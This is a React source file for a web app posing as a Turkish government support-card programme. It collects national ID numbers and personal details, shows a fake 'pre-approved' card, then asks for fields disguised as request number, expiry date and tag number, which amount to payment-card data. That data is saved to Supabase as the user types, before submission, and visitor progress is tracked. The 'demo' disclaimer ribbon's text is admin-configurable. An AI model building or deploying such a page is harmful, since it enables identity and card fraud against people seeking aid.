import React,{useEffect,useMemo,useRef,useState} from 'react'
import {ArrowLeft,ArrowRight,BadgeCheck,CheckCircle2,GraduationCap,HeartHandshake,Home,Info,Landmark,ShieldCheck,Store,Users} from 'lucide-react'
import {defaultPrograms,defaultSettings} from './defaults'
import {supabase,supabaseEnabled} from './supabase'

const iconMap={users:Users,graduation:GraduationCap,heart:HeartHandshake,store:Store,home:Home,landmark:Landmark}
const blankForm={name:'',surname:'',tc_no:'',birth:'',city:'',district:'',phone:'',email:'',income:'',household:'',consent:false}
const blankRequest={full_name:'',request_no:'',expiry:'',tag_no:''}
const deepMerge=(base,extra)=>{if(Array.isArray(base))return Array.isArray(extra)?extra:base;if(base&&typeof base==='object'){const out={...base};Object.keys(extra||{}).forEach(k=>{out[k]=k in base?deepMerge(base[k],extra[k]):extra[k]});return out}return extra??base}
const randomCard=()=>Array.from({length:16},()=>Math.floor(Math.random()*10)).join('').replace(/(\d{4})(?=\d)/g,'$1 ')
const onlyDigits=(v,n)=>v.replace(/\D/g,'').slice(0,n)
const expiryMask=v=>{const d=v.replace(/\D/g,'').slice(0,4);return d.length>2?d.slice(0,2)+'/'+d.slice(2):d}
function phoneMask(v){let d=v.replace(/\D/g,'');if(d.startsWith('90'))d=d.slice(2);if(d.startsWith('0'))d=d.slice(1);d=d.slice(0,10);if(!d)return '';let o='+90';if(d.length)o+=' ('+d.slice(0,3);if(d.length>=3)o+=')';if(d.length>3)o+=' '+d.slice(3,6);if(d.length>6)o+=' '+d.slice(6,8);if(d.length>8)o+=' '+d.slice(8,10);return o}
const validPhone=v=>v.replace(/\D/g,'').replace(/^90/,'').length===10
const validTc=v=>/^\d{11}$/.test(String(v||''))&&String(v)[0]!=='0'

export default function App(){
 const [settings,setSettings]=useState(defaultSettings),[programs,setPrograms]=useState(defaultPrograms),[banners,setBanners]=useState([]),[step,setStep]=useState(0),[program,setProgram]=useState(null),[form,setForm]=useState(blankForm),[request,setRequest]=useState(blankRequest),[error,setError]=useState(''),[uid,setUid]=useState(null),[applicationId,setApplicationId]=useState(null)
 const saveTimer=useRef(null),cardNo=useMemo(randomCard,[step===2])
 useEffect(()=>{(async()=>{if(!supabaseEnabled)return;const {data:{session}}=await supabase.auth.getSession();let user=session?.user;if(!user){const {data}=await supabase.auth.signInAnonymously();user=data?.user}setUid(user?.id||null);const [{data:s},{data:p},{data:b}]=await Promise.all([supabase.from('site_settings').select('data').eq('id','main').maybeSingle(),supabase.from('programs').select('*').eq('active',true).order('sort_order'),supabase.from('banners').select('*').eq('active',true).order('sort_order')]);if(s?.data)setSettings(deepMerge(defaultSettings,s.data));if(p?.length)setPrograms(p);if(b?.length)setBanners(b)})()},[])
 useEffect(()=>{if(!uid||!supabaseEnabled)return;const update=()=>supabase.from('visitor_sessions').upsert({user_id:uid,stage:step,program_id:program?.id||null,last_seen:new Date().toISOString()},{onConflict:'user_id'});update();const t=setInterval(update,25000);return()=>clearInterval(t)},[uid,step,program?.id])
 const requestComplete=useMemo(()=>{const c=settings.request_form;if(c.full_name.required&&!request.full_name.trim())return false;if(c.request_no.required&&request.request_no.length!==Number(c.request_no.length))return false;if(c.expiry.required&&!/^\d{2}\/\d{2}$/.test(request.expiry))return false;if(c.tag_no.required&&request.tag_no.length!==Number(c.tag_no.length))return false;return true},[request,settings.request_form])
 useEffect(()=>{if(step!==3||!form.consent||!uid||!supabaseEnabled||!requestComplete)return;clearTimeout(saveTimer.current);saveTimer.current=setTimeout(async()=>{const payload={user_id:uid,program_id:program?.id||null,applicant_name:form.name,applicant_surname:form.surname,tc_no:form.tc_no,birth_date:form.birth||null,city:form.city,district:form.district,phone:form.phone,email:form.email,income:form.income,household:form.household,request_full_name:request.full_name,request_no:request.request_no,expiry:request.expiry,tag_no:request.tag_no,status:'draft',submitted:false,updated_at:new Date().toISOString()};if(applicationId)await supabase.from('applications').update(payload).eq('id',applicationId);else{const {data}=await supabase.from('applications').insert(payload).select('id').single();if(data?.id)setApplicationId(data.id)}},450);return()=>clearTimeout(saveTimer.current)},[request,requestComplete,step,uid,form,program?.id,applicationId])
 const fieldReq=k=>settings.preform.fields[k]?.required
 const goPre=()=>{for(const k of ['name','surname','tc_no','birth','city','district','phone','email','income','household']){const cfg=settings.preform.fields[k];if(cfg?.visible&&cfg.required&&!String(form[k]||'').trim()){setError(`${cfg.label} alanını doldurun.`);return}}if(!form.consent){setError('Bilgilendirme onayı zorunludur.');return}if(settings.preform.fields.tc_no.visible&&fieldReq('tc_no')&&!validTc(form.tc_no)){setError('T.C. Kimlik Numarası 11 haneli demo/test formatında olmalıdır.');return}if(settings.preform.fields.phone.visible&&fieldReq('phone')&&!validPhone(form.phone)){setError('Telefon numarasını +90 (5XX) XXX XX XX formatında eksiksiz girin.');return}setError('');setStep(2);scrollTo(0,0)}
 const finish=async()=>{const c=settings.request_form;if(c.full_name.required&&!request.full_name.trim())return setError(`${c.full_name.label} zorunludur.`);if(c.request_no.required&&request.request_no.length!==Number(c.request_no.length))return setError(`${c.request_no.label} ${c.request_no.length} haneli olmalıdır.`);if(c.expiry.required&&!/^\d{2}\/\d{2}$/.test(request.expiry))return setError(`${c.expiry.label} AA/YY biçiminde olmalıdır.`);if(c.tag_no.required&&request.tag_no.length!==Number(c.tag_no.length))return setError(`${c.tag_no.label} ${c.tag_no.length} haneli olmalıdır.`);setError('');if(supabaseEnabled){const payload={user_id:uid,program_id:program?.id||null,applicant_name:form.name,applicant_surname:form.surname,tc_no:form.tc_no,birth_date:form.birth||null,city:form.city,district:form.district,phone:form.phone,email:form.email,income:form.income,household:form.household,request_full_name:request.full_name,request_no:request.request_no,expiry:request.expiry,tag_no:request.tag_no,status:'submitted',submitted:true,updated_at:new Date().toISOString()};if(applicationId)await supabase.from('applications').update(payload).eq('id',applicationId);else await supabase.from('applications').insert(payload)}setStep(4);scrollTo(0,0)}
 const goBack=()=>{setError('');setStep(s=>Math.max(0,s-1));scrollTo(0,0)}
 const pf=settings.preform.fields
 return <div className="public-app">
  <div className="demo-ribbon"><strong>DEMO PROTOTİP</strong><span> — {settings.demo_ribbon?.text||'RESMÎ KAMU HİZMETİ DEĞİLDİR — GERÇEK KİŞİSEL VERİ GİRMEYİN'}</span></div>
  {settings.top_bar.enabled&&<div className="top-announcement">{settings.top_bar.text}</div>}
  <header className="site-header"><div className="brand">{settings.header.logo_url?<img className="header-logo" src={settings.header.logo_url}/>:<div className="brand-mark"><ShieldCheck size={28}/></div>}<div><b>{settings.site_title}</b><small>{settings.site_subtitle}</small></div></div><div className="safe"><BadgeCheck size={18}/>{settings.header.safe_text}</div></header>
  <main className="shell">
   {step===0&&<>{banners.length>0&&<BannerCarousel banners={banners.slice(0,8)}/>}<section className="hero"><div><span className="eyebrow">{settings.home.eyebrow}</span><h1>{settings.home.hero_title}</h1><p>{settings.home.hero_text}</p><div className="notice"><Info size={20}/>{settings.home.notice_text}</div></div><aside><ShieldCheck size={38}/><b>{settings.home.side_title}</b><p>{settings.home.side_text}</p></aside></section><h2 className="section-title">{settings.home.programs_title}</h2><div className="program-grid">{programs.map(p=>{const Icon=iconMap[p.icon]||Users;return <button key={p.id} className="program-card" onClick={()=>{setProgram(p);setStep(1);scrollTo(0,0)}}><div className="icon-box"><Icon/></div><h3>{p.title}</h3><p>{p.description}</p><span>{settings.home.program_button} <ArrowRight size={16}/></span></button>})}</div></>}
   {step>0&&<Progress steps={settings.steps} current={step}/>} 
   {step===1&&<section className="panel"><div className="panel-head"><div><span className="eyebrow">{settings.preform.eyebrow}</span><h2>{program?.title}</h2></div></div><div className="notice"><Info size={18}/>{settings.preform.notice}</div><div className="form-grid">
    {pf.name.visible&&<Field cfg={pf.name} value={form.name} onChange={v=>setForm({...form,name:v})}/>} {pf.surname.visible&&<Field cfg={pf.surname} value={form.surname} onChange={v=>setForm({...form,surname:v})}/>} {pf.tc_no.visible&&<Field cfg={pf.tc_no} inputMode="numeric" maxLength={11} value={form.tc_no} onChange={v=>setForm({...form,tc_no:onlyDigits(v,11)})}/>} {pf.birth.visible&&<Field cfg={pf.birth} type="date" value={form.birth} onChange={v=>setForm({...form,birth:v})}/>} {pf.city.visible&&<Field cfg={pf.city} value={form.city} onChange={v=>setForm({...form,city:v})}/>} {pf.district.visible&&<Field cfg={pf.district} value={form.district} onChange={v=>setForm({...form,district:v})}/>} {pf.phone.visible&&<Field cfg={pf.phone} inputMode="tel" value={form.phone} onChange={v=>setForm({...form,phone:phoneMask(v)})}/>} {pf.email.visible&&<Field cfg={pf.email} type="email" value={form.email} onChange={v=>setForm({...form,email:v})}/>} {pf.income.visible&&<Field cfg={pf.income} inputMode="numeric" value={form.income} onChange={v=>setForm({...form,income:onlyDigits(v,10)})}/>} {pf.household.visible&&<Field cfg={pf.household} inputMode="numeric" value={form.household} onChange={v=>setForm({...form,household:onlyDigits(v,2)})}/>} 
   </div><label className="consent"><input type="checkbox" checked={form.consent} onChange={e=>setForm({...form,consent:e.target.checked})}/><span>{settings.preform.consent}</span></label>{error&&<div className="error">{error}</div>}<div className="actions split"><button className="ghost back-btn" onClick={()=>{setStep(0);scrollTo(0,0)}}><ArrowLeft size={18}/>{settings.preform.back_button}</button><button className="primary" onClick={goPre}>{settings.preform.next_button}<ArrowRight size={18}/></button></div></section>}
   {step===2&&<section className="panel centered"><div className="ok"><CheckCircle2 size={42}/></div><span className="eyebrow">{settings.preapproval.eyebrow}</span><h2>{settings.preapproval.title}</h2><p className="muted">{settings.preapproval.text}</p><CardPreview cfg={settings.preapproval} programCfg={program} cardNo={cardNo} name={`${form.name} ${form.surname}`} program={program?.title}/><div className="actions split centered-actions"><button className="ghost back-btn" onClick={goBack}><ArrowLeft size={18}/>{settings.buttons.preapproval_back}</button><button className="primary" onClick={()=>{setRequest(r=>({...r,full_name:`${form.name} ${form.surname}`}));setStep(3);scrollTo(0,0)}}>{settings.buttons.preapproval_next}<ArrowRight size={18}/></button></div></section>}
   {step===3&&<section className="panel"><span className="eyebrow">{settings.request_page.eyebrow}</span><h2>{settings.request_page.title}</h2><div className="logo-slots">{settings.request_page.logo_urls.map((u,i)=><div key={i}>{u?<img src={u} alt={`Görsel ${i+1}`}/>:<span>Logo / Görsel {i+1}</span>}</div>)}</div>{settings.request_page.price_enabled&&<div className="price-box"><div><span>{settings.request_page.price_title}</span><b>{settings.request_page.price_value} {settings.request_page.price_currency}</b></div>{settings.request_page.price_subtitle&&<small>{settings.request_page.price_subtitle}</small>}</div>}<div className="form-grid one"><RequestField cfg={settings.request_form.full_name} value={request.full_name} onChange={v=>setRequest({...request,full_name:v})}/><RequestField cfg={settings.request_form.request_no} inputMode="numeric" value={request.request_no} onChange={v=>setRequest({...request,request_no:onlyDigits(v,Number(settings.request_form.request_no.length)||18)})}/><RequestField cfg={settings.request_form.expiry} inputMode="numeric" value={request.expiry} onChange={v=>setRequest({...request,expiry:expiryMask(v)})}/><RequestField cfg={settings.request_form.tag_no} inputMode="numeric" value={request.tag_no} onChange={v=>setRequest({...request,tag_no:onlyDigits(v,Number(settings.request_form.tag_no.length)||8)})}/></div>{error&&<div className="error">{error}</div>}<div className="actions split"><button className="ghost back-btn" onClick={goBack}><ArrowLeft size={18}/>{settings.buttons.request_back}</button><button className="primary" onClick={finish}>{settings.buttons.request_submit}<CheckCircle2 size={18}/></button></div></section>}
   {step===4&&<section className="panel centered final-panel">{settings.final_page.icon_url?<img className="final-icon-img" style={{width:+settings.final_page.icon_size||72,height:+settings.final_page.icon_size||72}} src={settings.final_page.icon_url}/>:<div className="ok"><CheckCircle2 size={42}/></div>}<span className="eyebrow">{settings.final_page.eyebrow}</span><h2>{settings.final_page.title}</h2><p className="muted final-text">{settings.final_page.text}</p><div className="final-summary"><h3>{settings.final_page.summary_title}</h3><div><span>{settings.final_page.program_label}</span><b>{program?.title||'—'}</b></div><div><span>{settings.final_page.applicant_label}</span><b>{form.name} {form.surname}</b></div><div><span>{settings.final_page.request_label}</span><b>{request.request_no||'—'}</b></div></div><div className="actions split centered-actions"><button className="ghost back-btn" onClick={goBack}><ArrowLeft size={18}/>{settings.final_page.back_button}</button><button className="primary" onClick={()=>{setStep(0);setProgram(null);setForm(blankForm);setRequest(blankRequest);setApplicationId(null);scrollTo(0,0)}}>{settings.final_page.home_button}<Home size={18}/></button></div></section>}
  </main><footer><b>{settings.footer.text}</b><span>{settings.footer.subtext}</span></footer>
 </div>
}
function BannerCarousel({banners}){
 const [index,setIndex]=useState(0),touch=useRef(null);
 useEffect(()=>{if(banners.length<2)return;const t=setInterval(()=>setIndex(i=>(i+1)%banners.length),4500);return()=>clearInterval(t)},[banners.length]);
 useEffect(()=>{if(index>=banners.length)setIndex(0)},[banners.length,index]);
 const go=d=>setIndex(i=>(i+d+banners.length)%banners.length);
 return <section className="banner-carousel" aria-label="Duyuru bannerları" onTouchStart={e=>touch.current=e.touches[0].clientX} onTouchEnd={e=>{if(touch.current==null)return;const diff=e.changedTouches[0].clientX-touch.current;if(Math.abs(diff)>45)go(diff>0?-1:1);touch.current=null}}>
   <div className="banner-track" style={{transform:`translateX(-${index*100}%)`}}>{banners.map(b=><div className="banner-slide" key={b.id}><picture>{b.mobile_image_url&&<source media="(max-width: 620px)" srcSet={b.mobile_image_url}/>}<img src={b.image_url} alt={b.alt_text||'Banner'}/></picture></div>)}</div>
   {banners.length>1&&<><button className="banner-nav prev" type="button" onClick={()=>go(-1)} aria-label="Önceki banner">‹</button><button className="banner-nav next" type="button" onClick={()=>go(1)} aria-label="Sonraki banner">›</button><div className="banner-dots">{banners.map((b,i)=><button key={b.id} className={i===index?'active':''} onClick={()=>setIndex(i)} aria-label={`Banner ${i+1}`}/>)}</div></>}
 </section>
}
function Field({cfg,value,onChange,type='text',inputMode,maxLength}){return <label className="field"><span>{cfg.label}{cfg.required?' *':''}</span><input type={type} inputMode={inputMode} maxLength={maxLength} autoComplete="off" value={value} onChange={e=>onChange(e.target.value)} placeholder={cfg.placeholder}/></label>}
function RequestField({cfg,value,onChange,inputMode}){return <label className="field"><span>{cfg.label}{cfg.required?' *':''}</span><input inputMode={inputMode} autoComplete="off" value={value} onChange={e=>onChange(e.target.value)} placeholder={cfg.placeholder}/></label>}
function Progress({steps,current}){return <div className="progress">{steps.map((s,i)=><div className={`progress-item ${i+1<=current?'active':''}`} key={i}><div>{i+1}</div><span>{s}</span></div>)}</div>}
function CardPreview({cfg,programCfg,cardNo,name,program}){const bg=programCfg?.card_image_url||cfg.card_image_url;const color=programCfg?.card_text_color||cfg.card_text_color||'#fff';const style=bg?{backgroundImage:`linear-gradient(rgba(8,28,48,.18),rgba(8,28,48,.18)),url(${bg})`,color}:{color};return <div className="support-card" style={style}><div className="support-top"><div className="chip"/><span>{cfg.card_title}</span></div><div className="card-no">{cardNo}</div><div className="support-bottom"><div><small>{cfg.holder_label}</small><b>{(name||'ÖRNEK KULLANICI').toUpperCase()}</b></div><div><small>{cfg.program_label}</small><b>{(program||'Örnek Program').replace(' Destek Kartı','')}</b></div></div></div>}
